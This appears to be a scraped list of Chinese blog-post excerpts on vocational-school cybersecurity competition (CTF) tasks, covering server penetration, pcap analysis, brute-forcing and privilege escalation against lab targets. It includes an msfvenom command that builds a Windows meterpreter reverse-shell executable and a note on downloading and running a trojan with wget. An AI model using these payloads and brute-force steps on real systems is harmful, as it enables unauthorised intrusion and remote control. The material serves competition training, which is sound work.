中职组安全-win20230217-环境-解析 msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=10.100.100.119 LPORT=4444 -b"\x00" -f exe > aiyou.exe将驱动开启就可以传文件到靶机运行。5·访问服务器主机,找到主机中管理员桌面下文本文档信息,将文本文档中信息作为Flag值提交;6·访问服务器主机,找到主机中回收站唯一信息,将信息中的内容作为Flag值提交。3·访问服务器主机,找到主机中管理员密码,将管理员密码作为Flag值提交;
信息安全与评估-数据包分析 做为FLAG提交。4. 继续分析数据包capture-z2.pcap,分析黑客进行了协议攻击,将数据包协议名称,操作代码的值,协议类型16进制,发送者的 MAC 地址后四位16进制,发送者的实际IP 以冒号分隔的形式作为FLAG提交。2. 继续分析数据包capture-z2.pcap,发现了大量的扫描数据包,找出攻击机的 IP 地址,采用了哪一种端口扫描技术。6. 继续分析数据包capture-z2.pcap, 接上题,分析黑客是否获得了机密文件,将文件名作为FLAG提交。
B-5:系统渗透: 6.在渗透机中对服务器主机进行渗透,在服务器主机中找到管理员家目录下的flag文件,将文件中内容作为Flag值提交。5.在渗透机中对服务器主机进行渗透,在服务器主机中找到网站根目录下的flag文件,将文件中内容作为Flag值提交;2.在渗透机中对服务器主机进行渗透,在服务器主机中获取服务器主机名称,将主机名作为Flag值提交;4.在渗透机中对服务器主机进行渗透,在服务器主机中获取管理员的密码,将密码作为Flag值提交;1.在渗透机中对服务器主机进行信息收集,将服务器开启的端口号作为Flag值提交;
压缩包文件暴力破解 -Server2005(解析) 2. 通过本地PC中渗透测试平台Kali对服务器场景Windows进行渗透测试,使 用 kali 中 hydra 对服 务器 Telnet 服务进行暴力破解(用户名为 rartest), 找到加密后的压缩包文件,将加密压缩包的文 件名作为 Flag 提交;for /r C:/ %i in (*.zip) do @echo %i //找后缀名为zip的 这个有点鬼,命令打完,搜,我还以为那个地方是命令,其实是搜到东西。http://192.168.0.108/flag(Pwd000).zip //直接访问。
中职组网络安全赛题 2. 通过本地PC中的渗透测试平台KALI2020下载靶机中的数据包,通过WIRESHARK软件分析数据包内的数据,找到黑客扫描我们服务器开放了哪些端口,将我们服务器中开放的TCP端口按照从小到大的顺序排序后MD5加密后作为FLAG进行提交(如:MD5加密前:21/22/23/24/25);2. 通过本地PC中的渗透测试平台KALI2020下载靶机中的数据包,通过WIRESHARK软件分析数据包内的数据,找到黑客在网站中下载的私钥文件,将黑客下载的私钥文件的文件名进行MD5加密后作为FLAG进行提交;
Linux 系统渗透提权-Server2204-(解析) 4.使用渗透机对服务器管理员提权,并将服务器中 root 目录下的文本内容作 为 flag 提交;6.使用渗透机对服务器管理员提权,并将服务器中 root 目录下的图片内容作 为 flag 提交。5.使用渗透机对服务器管理员提权,并将服务器中 root 的密码作为 flag 提交;3.使用渗透机对服务器信息收集,并将服务器中系统内核版本作为 flag 提交;2.使用渗透机对服务器信息收集,并将服务器中主机名称作为 flag 提交;用linux的wget下载给777权限木马并执行。发现scp和nc都用不了。
系统渗透-lin20230502(解析+环境) 6.在渗透机中对服务器主机进行渗透,在服务器主机中找到管理员家目录下的flag文件,将文件中内容作为Flag值提交。5.在渗透机中对服务器主机进行渗透,在服务器主机中找到网站根目录下的flag文件,将文件中内容作为Flag值提交;2.在渗透机中对服务器主机进行渗透,在服务器主机中获取服务器主机名称,将主机名作为Flag值提交;4.在渗透机中对服务器主机进行渗透,在服务器主机中获取管理员的密码,将密码作为Flag值提交;1.在渗透机中对服务器主机进行信息收集,将服务器开启的端口号作为Flag值提交;
中间件渗透测试-Server2131(解析+环境) 通过渗透测试平台Kalie对靶机场景Server2131进行网站目录枚举渗透测试,使用工具dirb的默认字典来进行枚举,将dirb工具返回结果中的最后一行的URL作为Flag值提交;通过渗透测试平台Kali对靶机场景Server2131进行网站目录枚举渗透测试,使用工具dirb的默认字典来进行枚举,将dirb工具返回结果中的扫描到的目录数量作为Flag值提交;通过渗透测试平台Kali对靶机场景Server2131进行渗透测试,将该场景tomcat网站渗透成功后回显的关键提示信息作为Flag值提交;
中职网安-Linux操作系统渗透测-Server2130(环境加qq) B-9:Linux操作系统渗透测任务环境说明: 服务器场景:Server2130 服务器场景操作系统:Linux(关闭链接)1.通过本地PC中渗透测试平台Kali对靶机场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中Apache服务对应的版本信息字符串作为Flag值提交;2.通过本地PC中渗透测试平台Kali对靶机场景进行渗透测试,将该场景/var/www/html目录中waf防火墙文件中的所有的被过滤的字符串内容作为Flag值提交;
关注
